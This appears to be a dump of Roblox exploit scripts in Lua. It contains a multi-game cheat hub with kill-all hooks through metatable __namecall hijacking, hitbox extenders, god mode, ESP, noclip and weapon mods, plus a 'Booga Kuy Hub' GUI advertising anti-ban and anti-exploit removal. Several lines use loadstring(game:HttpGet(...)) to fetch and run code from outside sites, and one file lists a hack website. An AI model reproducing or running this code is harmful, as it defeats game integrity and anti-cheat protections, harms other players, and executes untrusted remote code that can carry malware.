Library:Create("Slider", "Jump Height", function(thing) 21 | game.Players.LocalPlayer.Character.Humanoid.JumpPower = thing 22 | end, {Default = 50, MinValue = 50, MaxValue = 500}) 23 | spawn(function() 24 | while wait() do 25 | if godmode == true then 26 | game.Workspace[game.Players.LocalPlayer.Name].KillScript.Disabled = true 27 | elseif godmode == false then 28 | game.Workspace[game.Players.LocalPlayer.Name].KillScript.Disabled = false 29 | end 30 | 31 | end 32 | end) 33 | local UserInputService = game:GetService("UserInputService") 34 | local key = Enum.KeyCode.Space 35 | local function is() 36 | return UserInputService:IsKeyDown(key) 37 | end 38 | local function Input(input, gameProcessedEvent) 39 | while is() and Jump do 40 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 41 | wait(.1) 42 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") 43 | end 44 | end 45 | UserInputService.InputBegan:Connect(Input) 46 | end 47 | 48 | -- Arsenal 49 | if game.GameId == 111958650 then 50 | local Library = Keylime.new("Main Functions") 51 | Library:Create("Toggle", "Inf Jump", function(thing) 52 | Jump = thing 53 | end, {Default = false}) 54 | Library:Create("Button", "No Falldamage", function() 55 | game:GetService("ReplicatedStorage").Events.FallDamage:Destroy() 56 | end) 57 | 58 | Library:Create("Button", "Hitbox Extender", function() 59 | spawn(function() 60 | while wait() do 61 | for i,v in pairs (game.Players:GetChildren()) do 62 | for i2,v2 in pairs (game.Workspace[v.Name]:GetChildren()) do 63 | if v2.Name == "LowerTorso" then 64 | if v.Name ~= game.Players.LocalPlayer.Name and v.Team ~= game.Players.LocalPlayer.Team then 65 | if v2.CanCollide == true then 66 | v2.CanCollide = false 67 | v2.Size = Vector3.new(30,30,30) 68 | v2.Parent.HumanoidRootPart.Size = Vector3.new(30,30,30) 69 | end 70 | elseif v.Team == game.Players.LocalPlayer.Team and v.Name ~= game.Players.LocalPlayer.Name then 71 | if v2.Parent.HumanoidRootPart.Size ~= Vector3.new(1,2,1) and v2.Size ~= Vector3.new(2,0.4,1) then 72 | v2.CanCollide = true 73 | v2.Size = Vector3.new(2,0.4,1) 74 | v2.Parent.HumanoidRootPart.Size = Vector3.new(1,2,1) 75 | end 76 | end 77 | end 78 | end 79 | end 80 | end 81 | end) 82 | end) 83 | 84 | Library:Create("Toggle", "Kill All", function(thing) 85 | mine = thing 86 | end, {Default = false}) 87 | 88 | distance = 5 89 | Library:Create("Toggle", "Lock Behind", function(thing) 90 | joe = thing 91 | end, {Default = false}) 92 | Library:Create("Slider", "Distance", function(thing) 93 | distance = thing 94 | end, {Default = 5, MinValue = 2, MaxValue = 15}) 95 | spawn(function() 96 | while wait() do 97 | for i,v in pairs(game.Players:GetPlayers()) do 98 | if v.Name ~= game.Players.LocalPlayer.Name and v.Team ~= game.Players.LocalPlayer.Team and v.Character:FindFirstChild("Spawned") and joe then 99 | repeat 100 | game.Players.LocalPlayer.Character.Humanoid:ChangeState(11) 101 | game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,distance) 102 | wait() 103 | until not v.Character:FindFirstChild("Spawned") or v.Team == game.Players.LocalPlayer.Team and joe 104 | end 105 | end 106 | end 107 | end) 108 | 109 | local mt = getrawmetatable(game) 110 | local oldNamecall = mt.__namecall 111 | setreadonly(mt, false) 112 | 113 | mt.__namecall = newcclosure(function(self, ...) 114 | local args = {...} 115 | if tostring(self) == "HitPart" then 116 | for i,v in pairs(game.Players.GetPlayers(game.Players)) do 117 | if v.Character and v ~= game.Players.LocalPlayer and v.TeamColor ~= game.Players.LocalPlayer.TeamColor and mine then 118 | args[1] = v.Character.Head 119 | args[2] = v.Character.Head.Position 120 | for i = 1, 15 do 121 | oldNamecall(self, unpack(args)) 122 | end 123 | end 124 | end 125 | end 126 | return oldNamecall(self, ...) 127 | end) 128 | 129 | setreadonly(mt, true) 130 | 131 | Library:Create("Button", "Gun Mod", function() 132 | for i,v in pairs(getgc()) do 133 | if typeof(v) == "function" and debug.getinfo(v).name == "updateInventory" then 134 | for i2,v2 in pairs(getupvalues(v)) do 135 | game:GetService("RunService").Stepped:Connect(function() 136 | debug.setupvalue(v, 3, 69) 137 | end) 138 | end 139 | end 140 | end 141 | for i,v in pairs(getgc()) do 142 | if type(v) == 'function' and debug.getinfo(v).name == 'firebullet' then 143 | functionEnv = getfenv(v) 144 | break 145 | end 146 | end 147 | 148 | while wait() do 149 | functionEnv.recoil = 0 150 | functionEnv.currentspread = 0 151 | functionEnv.spreadmodifier = 0 152 | end 153 | end) 154 | local UserInputService = game:GetService("UserInputService") 155 | local key = Enum.KeyCode.Space 156 | local function is() 157 | return UserInputService:IsKeyDown(key ) 158 | end 159 | local function Input(input, gameProcessedEvent) 160 | while is() and Jump do 161 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 162 | wait(.1) 163 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") 164 | end 165 | end 166 | UserInputService.InputBegan:Connect(Input) 167 | end 168 | 169 | -- CBRO 170 | if game.GameId == 115797356 then 171 | local Library = Keylime.new("Main Functions") 172 | Library:Create("Toggle", "Inf Jump", function(thing) 173 | Jump = thing 174 | end, {Default = false}) 175 | Library:Create("Button", "No Falldamage", function() 176 | game:GetService("ReplicatedStorage").Events.FallDamage:Destroy() 177 | end) 178 | 179 | Library:Create("Button", "Gun Mod", function() 180 | for i,v in pairs(game:GetService("ReplicatedStorage").Weapons:GetDescendants()) do 181 | if v.Name == "FireRate" then 182 | v.Value = 0 183 | end 184 | if v.Name == "Ammo" then 185 | v.Value = 9e9 186 | end 187 | if v.Name == "StoredAmmo" then 188 | v.Value = 9e9 189 | end 190 | if v.Name == "Auto" then 191 | v.Value = true 192 | end 193 | end 194 | end) 195 | 196 | Library:Create("Toggle", "Kill All", function(thing) 197 | mine = thing 198 | end, {Default = false}) 199 | 200 | local mt = getrawmetatable(game) 201 | local oldNamecall = mt.__namecall 202 | setreadonly(mt, false) 203 | 204 | mt.__namecall = newcclosure(function(self, ...) 205 | local args = {...} 206 | if tostring(self) == "HitPart" then 207 | for i,v in pairs(game.Players.GetPlayers(game.Players)) do 208 | if v.Character and v ~= game.Players.LocalPlayer and v.TeamColor ~= game.Players.LocalPlayer.TeamColor and mine then 209 | args[1] = v.Character.Head 210 | args[2] = v.Character.Head.Position 211 | for i = 1, 15 do 212 | oldNamecall(self, unpack(args)) 213 | end 214 | end 215 | end 216 | end 217 | return oldNamecall(self, ...) 218 | end) 219 | 220 | setreadonly(mt, true) 221 | 222 | local UserInputService = game:GetService("UserInputService") 223 | local key = Enum.KeyCode.Space 224 | local function is() 225 | return UserInputService:IsKeyDown(key ) 226 | end 227 | local function Input(input, gameProcessedEvent) 228 | while is() and Jump do 229 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 230 | wait(.1) 231 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") 232 | end 233 | end 234 | UserInputService.InputBegan:Connect(Input) 235 | end 236 | 237 | -- Big Paintball 238 | if game.GameId == 1247975681 then 239 | local Library = Keylime.new("Main Functions") 240 | Library:Create("Button", "Hitbox Extender (Buggy)", function() 241 | while wait() do 242 | spawn(function() 243 | while wait() do 244 | for i,v in pairs (game.Players:GetChildren()) do 245 | for i2,v2 in pairs (game.Workspace:GetChildren()) do 246 | if v.Name == v2.Name then 247 | local tester = v2:WaitForChild("Hitbox") 248 | tester.Size = Vector3.new(100, 100, 100) 249 | tester.Transparency = .6 250 | tester.CanCollide = false 251 | tester.Anchored = false 252 | end 253 | end 254 | end 255 | end 256 | end) 257 | 258 | spawn(function() 259 | while wait() do 260 | local play = game.Workspace[game.Players.LocalPlayer.Name] 261 | local player = play:WaitForChild("Hitbox") 262 | player.Size = Vector3.new(3.6, 6, 1.5) 263 | player.Transparency = 1 264 | player.CanCollide = false 265 | player.Anchored = false 266 | end 267 | end) 268 | 269 | spawn(function() 270 | while wait() do 271 | for i,v in pairs (game.Players:GetChildren()) do 272 | for i2,v2 in pairs (game.Workspace:GetChildren()) do 273 | if v.Name == v2.Name then 274 | local tester = v2:WaitForChild("Hitbox") 275 | local tester2 = tester:WaitForChild("WeldConstraint") 276 | local tester3 = tester:WaitForChild("OriginalSize") 277 | tester2:Destroy() 278 | tester3:Destroy() 279 | end 280 | end 281 | end 282 | end 283 | end) 284 | end 285 | end) 286 | Library:Create("Toggle", "Inf Jump", function(thing) 287 | Jump = thing 288 | end, {Default = false}) 289 | 290 | Library:Create("Button", "Gun Mod", function() 291 | for i,v in pairs(getgc(true)) do 292 | if type(v) == 'table' and rawget(v, "damage") then 293 | v.firerate = 0.00001 294 | v.automatic = true 295 | v.velocity = 1000 296 | end 297 | end 298 | end) 299 | 300 | local UserInputService = game:GetService("UserInputService") 301 | local key = Enum.KeyCode.Space 302 | local function is() 303 | return UserInputService:IsKeyDown(key ) 304 | end 305 | local function Input(input, gameProcessedEvent) 306 | while is() and Jump do 307 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 308 | wait(.1) 309 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") 310 | end 311 | end 312 | UserInputService.InputBegan:Connect(Input) 313 | end 314 | 315 | -- Strucid 316 | if game.GameId == 833423526 then 317 | local Library = Keylime.new("Main Functions") 318 | Library:Create("Toggle", "Inf Jump", function(thing) 319 | Jump = thing 320 | end, {Default = false}) 321 | 322 | Library:Create("Button", "God Mode", function() 323 | local ezpz2 = game.Workspace[game.Players.LocalPlayer.Name].Shield 324 | ezpz2:Destroy() 325 | end) 326 | 327 | Library:Create("Button", "No Falldamage", function() 328 | local StrucidNetwork = require(game:GetService("ReplicatedStorage").NetworkModule) 329 | local old = StrucidNetwork.FireServer 330 | StrucidNetwork.FireServer = newcclosure(function(self, action, ...) 331 | if action == "FallDamage" then 332 | return 333 | end 334 | return old(self, action, ...) 335 | end) 336 | end) 337 | 338 | Library:Create("Button", "Gun Mod", function() 339 | spawn(function() 340 | while wait(5) do 341 | for i,v in pairs(debug.getupvalues(getsenv(game:GetService("Players").LocalPlayer.PlayerGui.MainGui.MainLocal).Reload)) do 342 | if i == 3 then 343 | gunTbl = v 344 | end 345 | end 346 | game:GetService("RunService").Stepped:Connect(function() 347 | gunTbl.Debounce = 0.01 348 | end) 349 | getsenv(game:GetService("Players").LocalPlayer.PlayerGui.MainGui.MainLocal).CameraRecoil = function() 350 | end 351 | end 352 | end) 353 | end) 354 | 355 | local key = Enum.KeyCode.Space 356 | local function is() 357 | return UserInputService:IsKeyDown(key ) 358 | end 359 | local function Input(input, gameProcessedEvent) 360 | while is() and Jump do 361 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 362 | wait(.1) 363 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") 364 | end 365 | end 366 | UserInputService.InputBegan:Connect(Input) 367 | end 368 | 369 | local Keylime = loadstring(game:HttpGet('https://strazos.xyz/files/5f83c2d2ce76f33d75fdb818.txt'))() 370 | local person = game.Players.LocalPlayer.Character.HumanoidRootPart 371 | 372 | -- Flee The Facility 373 | if game.GameId == 372226183 then 374 | local Library = Keylime.new("Main Functions") 375 | Library:Create("Slider", "Walkspeed", function(thing) 376 | game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = thing 377 | end, {Default = 16, MinValue = 16, MaxValue = 100}) 378 | 379 | Library:Create("Button", "Third Person (Beast)", function() 380 | game:GetService('Players').LocalPlayer.CameraMode = 'Classic' 381 | game:GetService("Players").LocalPlayer.CameraMaxZoomDistance = 500 382 | end) 383 | 384 | Library:Create("Button", "Auto Computers", function() 385 | 386 | for i,v in pairs (game.Workspace:GetDescendants()) do 387 | spawn(function() 388 | while wait() do 389 | game.ReplicatedStorage.RemoteEvent:FireServer("SetPlayerMinigameResult", true) 390 | end 391 | end) 392 | repeat 393 | for i2,v2 in pairs (game.Workspace:GetDescendants()) do 394 | if v2.Name == "ComputerTrigger1" and v2.Parent.Name ~= "PrefabComputerTable" then 395 | print("test") 396 | person.CFrame = v2.CFrame 397 | wait(1) 398 | game:GetService("ReplicatedStorage").RemoteEvent:FireServer("Input", "Action", true) 399 | wait(1) 400 | game:GetService("ReplicatedStorage").RemoteEvent:FireServer("Input", "Action", true) 401 | game:GetService("ReplicatedStorage").RemoteEvent:FireServer("Input", "Action", true) 402 | wait(1) 403 | game:GetService("ReplicatedStorage").RemoteEvent:FireServer("Input", "Action", true) 404 | game:GetService("ReplicatedStorage").RemoteEvent:FireServer("Input", "Action", true) 405 | wait(8) 406 | end 407 | end 408 | until game:GetService("ReplicatedStorage").ComputersLeft.Value == 0 409 | end 410 | end) 411 | 412 | Library:Create("Button", "Win (After Computers)", function() 413 | 414 | for i,v in pairs (game.Workspace:GetDescendants()) do 415 | if v.Name == "ExitArea" then 416 | person.CFrame = v.CFrame 417 | end 418 | end 419 | 420 | end) 421 | 422 | Library:Create("Toggle", "Noclip", function(thing) 423 | noclip = thing 424 | end, {Default = false}) 425 | 426 | 427 | game:GetService('RunService').Stepped:connect(function() 428 | if noclip then 429 | game.Players.LocalPlayer.Character.Humanoid:ChangeState(11) 430 | end 431 | end) 432 | end 433 | 434 | -- Lost 435 | if game.GameId == 597889174 then 436 | local person = game.Players.LocalPlayer.Character.HumanoidRootPart 437 | local Library2 = Keylime.new("Main Functions") 438 | 439 | Library2:Create("Toggle", "Inf Jump", function(thing) 440 | Jump = thing 441 | end, {Default = false}) 442 | 443 | Library2:Create("Button", "Fullbright", function() 444 | game.Lighting.FogEnd = 10000 445 | game.Lighting.GlobalShadows = true 446 | game.Lighting.Ambient = Color3.new(1,1,1) 447 | game.Lighting.ClockTime = 13 448 | game.Lighting.Brightness = 2 449 | end) 450 | 451 | Library2:Create("Button", "Third Person", function() 452 | game:GetService('Players').LocalPlayer.CameraMode = 'Classic' 453 | game:GetService("Players").LocalPlayer.CameraMaxZoomDistance = 500 454 | end) 455 | 456 | Library2:Create("Button", "No Drown", function() 457 | local mt = getrawmetatable(game) 458 | setreadonly(mt, false) 459 | local oldNamecall = mt.__namecall 460 | 461 | mt.__namecall = newcclosure(function(self, ...) 462 | if tostring(self) == "Drown" then 463 | return 464 | end 465 | return oldNamecall(self, ...) 466 | end) 467 | 468 | setreadonly(mt, true) 469 | end) 470 | 471 | local Library = Keylime.new("Raiding Tools") 472 | Library:Create("Toggle", "Wall", function(thing) 473 | wall = thing 474 | end, {Default = false}) 475 | Library:Create("Toggle", "Doorway", function(thing2) 476 | doorway = thing2 477 | end, {Default = false}) 478 | Library:Create("Toggle", "Floor", function(thing3) 479 | Floor = thing3 480 | end, {Default = false}) 481 | 482 | Library:Create("Toggle", "Item Esp", function(thing) 483 | lolok = thing 484 | end, {Default = false}) 485 | 486 | local cont = function(hook) 487 | local core = game:GetService("CoreGui") 488 | local gamer = Instance.new("BillboardGui") 489 | local frame = Instance.new("Frame") 490 | local namey = Instance.new("TextLabel") 491 | gamer.Parent = core 492 | gamer.Name = "goneisstupid" 493 | gamer.AlwaysOnTop = true 494 | gamer.Size = UDim2.new(2, 0, 2, 0) 495 | frame.BackgroundTransparency = 0.4 496 | frame.BorderSizePixel = 0 497 | frame.Size = UDim2.new(1, 0, 1, 0) 498 | frame.Parent = gamer 499 | gamer.Adornee = hook 500 | spawn(function() 501 | while wait() do 502 | if lolok then 503 | frame.Visible = true 504 | elseif not lolok then 505 | frame.Visible = false 506 | end 507 | end 508 | end) 509 | end 510 | 511 | for i,v in pairs(game.Workspace.Containers:GetDescendants()) do 512 | if v.ClassName == "Part" then 513 | cont(v) 514 | end 515 | end 516 | 517 | spawn(function() 518 | while wait() do 519 | if wall then 520 | for i,v in pairs (game:GetService("Workspace").BuiltObjects:GetChildren()) do 521 | if v.Name == "Wall" then 522 | v.Wall.Transparency = .7 523 | end 524 | end 525 | elseif not wall then 526 | for i,v in pairs (game:GetService("Workspace").BuiltObjects:GetChildren()) do 527 | if v.Name == "Wall" then 528 | v.Wall.Transparency = 0 529 | end 530 | end 531 | end 532 | end 533 | end) 534 | spawn(function() 535 | while wait() do 536 | if doorway then 537 | for i,v in pairs (game:GetService("Workspace").BuiltObjects:GetChildren()) do 538 | if v.Name == "Doorway" then 539 | v.Doorway.Transparency = .7 540 | end 541 | end 542 | elseif not doorway then 543 | for i,v in pairs (game:GetService("Workspace").BuiltObjects:GetChildren()) do 544 | if v.Name == "Doorway" then 545 | v.Doorway.Transparency = 0 546 | end 547 | end 548 | end 549 | end 550 | end) 551 | spawn(function() 552 | while wait() do 553 | if Floor then 554 | for i,v in pairs (game:GetService("Workspace").BuiltObjects:GetChildren()) do 555 | if v.Name == "Floor" then 556 | v.Floor.Transparency = .7 557 | end 558 | end 559 | elseif not doorway then 560 | for i,v in pairs (game:GetService("Workspace").BuiltObjects:GetChildren()) do 561 | if v.Name == "Floor" then 562 | v.Floor.Transparency = 0 563 | end 564 | end 565 | end 566 | end 567 | end) 568 | 569 | local UserInputService = game:GetService("UserInputService") 570 | local key = Enum.KeyCode.Space 571 | local function is() 572 | return UserInputService:IsKeyDown(key) 573 | end 574 | local function Input(input, gameProcessedEvent) 575 | while is() and Jump do 576 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 577 | wait(2) 578 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Seated") 579 | end 580 | end 581 | UserInputService.InputBegan:Connect(Input) 582 | end 583 | 584 | -- Spider 585 | if game.GameId == 1776914212 then 586 | local Library = Keylime.new("Main Functions") 587 | 588 | local esp = function(hook) 589 | local core = game:GetService("CoreGui") 590 | local gamer = Instance.new("BillboardGui") 591 | local frame = Instance.new("Frame") 592 | local namey = Instance.new("TextLabel") 593 | gamer.Parent = core 594 | gamer.Name = "goneisstupid" 595 | gamer.AlwaysOnTop = true 596 | gamer.Size = UDim2.new(6, 0, 3, 0) 597 | frame.BackgroundTransparency = 0.4 598 | frame.BorderSizePixel = 2 599 | frame.Size = UDim2.new(1, 0, 1, 0) 600 | frame.Parent = gamer 601 | gamer.Adornee = hook 602 | end 603 | 604 | local playeresp = function(hook) 605 | local core = game:GetService("CoreGui") 606 | local gamer = Instance.new("BillboardGui") 607 | local frame = Instance.new("Frame") 608 | local namey = Instance.new("TextLabel") 609 | gamer.Parent = core 610 | gamer.Name = "goneisstupid" 611 | gamer.AlwaysOnTop = true 612 | gamer.Size = UDim2.new(4, 0, 5, 0) 613 | frame.BackgroundTransparency = 0.4 614 | frame.BorderSizePixel = 2 615 | frame.Size = UDim2.new(1, 0, 1, 0) 616 | frame.Parent = gamer 617 | gamer.Adornee = hook 618 | end 619 | 620 | Library:Create("Textbox", "Player Name", function(thing) 621 | _G.telename = thing 622 | person.CFrame = game.Workspace[_G.telename].HumanoidRootPart.CFrame 623 | end) 624 | 625 | local itemesp = function(hook, text, size1, size2) 626 | local core = game:GetService("CoreGui") 627 | local gamer = Instance.new("BillboardGui") 628 | local frame = Instance.new("Frame") 629 | local textthing = Instance.new("TextLabel") 630 | gamer.Parent = core 631 | gamer.Name = "goneisstupid" 632 | gamer.AlwaysOnTop = true 633 | gamer.Size = UDim2.new(size1, 0, size2, 0) 634 | frame.BackgroundTransparency = .4 635 | frame.Size = UDim2.new(1, 0, 1, 0) 636 | frame.Parent = gamer 637 | gamer.Adornee = hook 638 | textthing.Text = text 639 | textthing.TextSize = 12 640 | textthing.Visible = true 641 | textthing.Size = UDim2.new(0, .8, 0, .5) 642 | textthing.Parent = frame 643 | end 644 | 645 | Library:Create("Button", "Spider Esp (Use as Player)", function() 646 | for i,v in pairs (game.Players:GetPlayers()) do 647 | for i2,v2 in pairs (game.Workspace[v.Name]:GetChildren()) do 648 | if v2.Name == "IsSpiderCharacter" then 649 | espthing = v2.Parent.HumanoidRootPart 650 | esp(espthing, 6, 3) 651 | end 652 | end 653 | end 654 | print("loaded spider esp") 655 | warn("loaded spider esp") 656 | end) 657 | 658 | Library:Create("Button", "Player Esp (Use as Spider)", function() 659 | for i,v in pairs (game.Players:GetPlayers()) do 660 | for i2,v2 in pairs (game.Workspace[v.Name]:GetChildren()) do 661 | if v2.Parent.Name ~= game.Players.LocalPlayer.Name then 662 | if v2.Name == "IsSpiderCharacter" then 663 | break 664 | end 665 | if v2.Name == "HumanoidRootPart" then 666 | playeresp(v2) 667 | end 668 | end 669 | end 670 | end 671 | print("loaded player esp") 672 | warn("loaded player esp") 673 | end) 674 | 675 | Library:Create("Button", "Item Esp (Use as Player)", function() 676 | for i,v in pairs (game:GetService("Workspace").Items:GetDescendants()) do 677 | if v.Name == "Hitbox" or v.Name == "Handle" then 678 | itemesp(v, "test", 1, 1) 679 | end 680 | end 681 | end) 682 | end 683 | -------------------------------------------------------------------------------- /Badge Giver: -------------------------------------------------------------------------------- 1 | game:GetService("ReplicatedStorage").Events.Badge:FireServer(URIDHERE) 2 | /\/\/\/\ 3 | Badge id 4 | -------------------------------------------------------------------------------- /Best SkyBlock Scripts: -------------------------------------------------------------------------------- 1 | Roblox Hack Websites 2 | 3 | https://arponag.xyz/ 4 | 5 | 6 | loadstring(game:HttpGet("https://system-exodus.com/scripts/Skyblock/Skyblock.lua",true))() 7 | -------------------------------------------------------------------------------- /Booga Booga: -------------------------------------------------------------------------------- 1 | -- Farewell Infortality. - Bypass With Anti Ban Has Been Made By Blue 2 | -- Booga Kuy Hub Version: 2.0 3 | -- Instances: - Project Kuy Hub 4 | local StartGui = Instance.new("ScreenGui") 5 | local StartFrame = Instance.new("Frame") 6 | local Name = Instance.new("TextLabel") 7 | local Run = Instance.new("TextButton") 8 | local HELP = Instance.new("TextButton") 9 | local BypassActived = Instance.new("TextButton") 10 | local ImageLabel = Instance.new("ImageLabel") 11 | local POWER = Instance.new("TextLabel") 12 | local VERSION = Instance.new("TextButton") 13 | local MAKEBY = Instance.new("TextLabel") 14 | local TextLabel = Instance.new("TextLabel") 15 | local Open = Instance.new("TextButton") 16 | local Fram = Instance.new("Frame") 17 | local Namegui = Instance.new("TextLabel") 18 | local mainframe = Instance.new("Frame") 19 | local RAINBOW = Instance.new("TextButton") 20 | local BoogaBitchV2 = Instance.new("TextButton") 21 | local ADMIN = Instance.new("TextButton") 22 | local BBG = Instance.new("TextButton") 23 | local BoogaFucker = Instance.new("TextButton") 24 | local Exit = Instance.new("TextButton") 25 | local OnyxHUB = Instance.new("TextButton") 26 | local Rainbow = Instance.new("Frame") 27 | local BYPASS2 = Instance.new("TextLabel") 28 | local Frame = Instance.new("Frame") 29 | local MOJOCRAFT = Instance.new("TextButton") 30 | local BillboardGui = Instance.new("BillboardGui") 31 | local FEKILL = Instance.new("TextButton") 32 | local aimbot = Instance.new("TextButton") 33 | local GUIMADEBYPEEMAIGAMERTV = Instance.new("TextLabel") 34 | local FUCKYOU = Instance.new("TextLabel") 35 | local ANTIBAN = Instance.new("Frame") 36 | local Antiban = Instance.new("TextLabel") 37 | --Properties: 38 | StartGui.Name = "StartGui" 39 | StartGui.Parent = game.CoreGui 40 | 41 | 42 | StartFrame.Name = "StartFrame" 43 | StartFrame.Parent = StartGui 44 | StartFrame.Active = true 45 | StartFrame.BackgroundColor3 = Color3.new(0, 0, 0) 46 | StartFrame.BorderColor3 = Color3.new(0, 1, 0) 47 | StartFrame.Position = UDim2.new(0.421178341, 0, 0.31181103, 0) 48 | StartFrame.Selectable = true 49 | StartFrame.Size = UDim2.new(0, 303, 0, 238) 50 | StartFrame.Style = Enum.FrameStyle.RobloxRound 51 | StartFrame.Draggable = true 52 | 53 | 54 | Name.Name = "Name" 55 | Name.Parent = StartFrame 56 | Name.BackgroundColor3 = Color3.new(0, 0, 0) 57 | Name.Position = UDim2.new(0.046193745, 0, 0.0526446179, 0) 58 | Name.Size = UDim2.new(0, 260, 0, 50) 59 | Name.Font = Enum.Font.GothamBold 60 | Name.Text = "BOOGA KUY HUB" 61 | Name.TextColor3 = Color3.new(0.933333, 0.933333, 0.933333) 62 | Name.TextScaled = true 63 | Name.TextSize = 14 64 | Name.TextWrapped = true 65 | 66 | 67 | Run.Name = "Run" 68 | Run.Parent = StartFrame 69 | Run.BackgroundColor3 = Color3.new(0.203922, 0.203922, 0.203922) 70 | Run.Position = UDim2.new(0.123952731, 0, 0.332819074, 0) 71 | Run.Size = UDim2.new(0, 213, 0, 50) 72 | Run.Font = Enum.Font.Highway 73 | Run.Text = "START THE GUI" 74 | Run.TextColor3 = Color3.new(1, 0, 0) 75 | Run.TextScaled = true 76 | Run.TextSize = 14 77 | Run.TextWrapped = true 78 | Run.MouseButton1Down:connect(function() 79 | Fram.Visible = true 80 | RAINBOW.Visible = true 81 | Frame.Visible = true 82 | mainframe.Visible = true 83 | StartFrame.Visible = false 84 | Open.Visible = true 85 | ANTIBAN.Visible = true 86 | end) 87 | 88 | 89 | HELP.Name = "HELP" 90 | HELP.Parent = StartFrame 91 | HELP.BackgroundColor3 = Color3.new(0.223529, 0.223529, 0.223529) 92 | HELP.Position = UDim2.new(0.122693561, 0, 0.591752768, 0) 93 | HELP.Size = UDim2.new(0, 213, 0, 50) 94 | HELP.Font = Enum.Font.Highway 95 | HELP.Text = "REMOVE ANTI EXPLOIT" 96 | HELP.TextColor3 = Color3.new(1, 0, 0) 97 | HELP.TextScaled = true 98 | HELP.TextSize = 14 99 | HELP.TextWrapped = true 100 | 101 | 102 | BypassActived.Name = "Bypass Actived" 103 | BypassActived.Parent = StartFrame 104 | BypassActived.BackgroundColor3 = Color3.new(0, 1, 0) 105 | BypassActived.Position = UDim2.new(0.122673817, 0, 0.858442008, 0) 106 | BypassActived.Size = UDim2.new(0, 207, 0, 31) 107 | BypassActived.Font = Enum.Font.SciFi 108 | BypassActived.Text = "Bypass Actived" 109 | BypassActived.TextColor3 = Color3.new(0, 0, 0) 110 | BypassActived.TextScaled = true 111 | BypassActived.TextSize = 14 112 | BypassActived.TextWrapped = true 113 | 114 | 115 | ImageLabel.Parent = BypassActived 116 | ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1) 117 | ImageLabel.Position = UDim2.new(1, 0, 0, 0) 118 | ImageLabel.Size = UDim2.new(0, 31, 0, 31) 119 | ImageLabel.Image = "rbxassetid://185871276" 120 | 121 | 122 | POWER.Name = "POWER" 123 | POWER.Parent = StartFrame 124 | POWER.BackgroundColor3 = Color3.new(0.415686, 0.415686, 0.415686) 125 | POWER.Position = UDim2.new(0.0414444804, 0, -0.0352729373, 0) 126 | POWER.Size = UDim2.new(0, 260, 0, 22) 127 | POWER.Font = Enum.Font.GothamBold 128 | POWER.Text = "POWERED BY GUESTNOOB TEAM" 129 | POWER.TextColor3 = Color3.new(0, 0, 0) 130 | POWER.TextScaled = true 131 | POWER.TextSize = 14 132 | POWER.TextWrapped = true 133 | 134 | 135 | VERSION.Name = "VERSION" 136 | VERSION.Parent = StartFrame 137 | VERSION.BackgroundColor3 = Color3.new(0.196078, 0.196078, 0.196078) 138 | VERSION.Position = UDim2.new(0.946220577, 0, -0.0385662392, 0) 139 | VERSION.Size = UDim2.new(0, 26, 0, 31) 140 | VERSION.Font = Enum.Font.GothamBlack 141 | VERSION.Text = "V2" 142 | VERSION.TextColor3 = Color3.new(0, 0, 0) 143 | VERSION.TextSize = 14 144 | 145 | 146 | MAKEBY.Name = "MAKE BY" 147 | MAKEBY.Parent = StartFrame 148 | MAKEBY.BackgroundColor3 = Color3.new(0.372549, 0.372549, 0.372549) 149 | MAKEBY.Position = UDim2.new(0.0386473425, 0, 14.7222223, 0) 150 | MAKEBY.Size = UDim2.new(0, 200, 0, 13) 151 | MAKEBY.Font = Enum.Font.GothamBlack 152 | MAKEBY.Text = "ANTI BAN BY.BLUE" 153 | MAKEBY.TextColor3 = Color3.new(0, 1, 1) 154 | MAKEBY.TextSize = 14 155 | 156 | 157 | TextLabel.Parent = StartFrame 158 | TextLabel.BackgroundColor3 = Color3.new(0.207843, 0.207843, 0.207843) 159 | TextLabel.Position = UDim2.new(0.126152813, 0, 0.273780257, 0) 160 | TextLabel.Size = UDim2.new(0, 212, 0, 19) 161 | TextLabel.Font = Enum.Font.GothamBlack 162 | TextLabel.Text = "anti ban was made by.blue" 163 | TextLabel.TextColor3 = Color3.new(0, 1, 1) 164 | TextLabel.TextSize = 14 165 | 166 | 167 | Open.Name = "Open" 168 | Open.Parent = StartGui 169 | Open.BackgroundColor3 = Color3.new(0.666667, 0.333333, 1) 170 | Open.BorderColor3 = Color3.new(0.666667, 0, 1) 171 | Open.Position = UDim2.new(0.0111464849, 0, 0.396850437, 0) 172 | Open.Selectable = false 173 | Open.Size = UDim2.new(0, 127, 0, 48) 174 | Open.Visible = false 175 | Open.Font = Enum.Font.Cartoon 176 | Open.Text = "OPEN THE GUI" 177 | Open.TextColor3 = Color3.new(0, 0, 0) 178 | Open.TextScaled = true 179 | Open.TextSize = 14 180 | Open.TextWrapped = true 181 | Open.MouseButton1Click:connect(function() 182 | Fram.Visible = true 183 | mainframe.Visible = true 184 | Frame.Visible = true 185 | RAINBOW.Visible = true 186 | Open.Visible = false 187 | end) 188 | 189 | 190 | Fram.Name = "Fram" 191 | Fram.Parent = StartGui 192 | Fram.Active = true 193 | Fram.BackgroundColor3 = Color3.new(0.184314, 0.184314, 0.184314) 194 | Fram.Position = UDim2.new(0.382165611, 0, 0.250393689, 0) 195 | Fram.Selectable = true 196 | Fram.Size = UDim2.new(0, 414, 0, 452) 197 | Fram.Visible = false 198 | 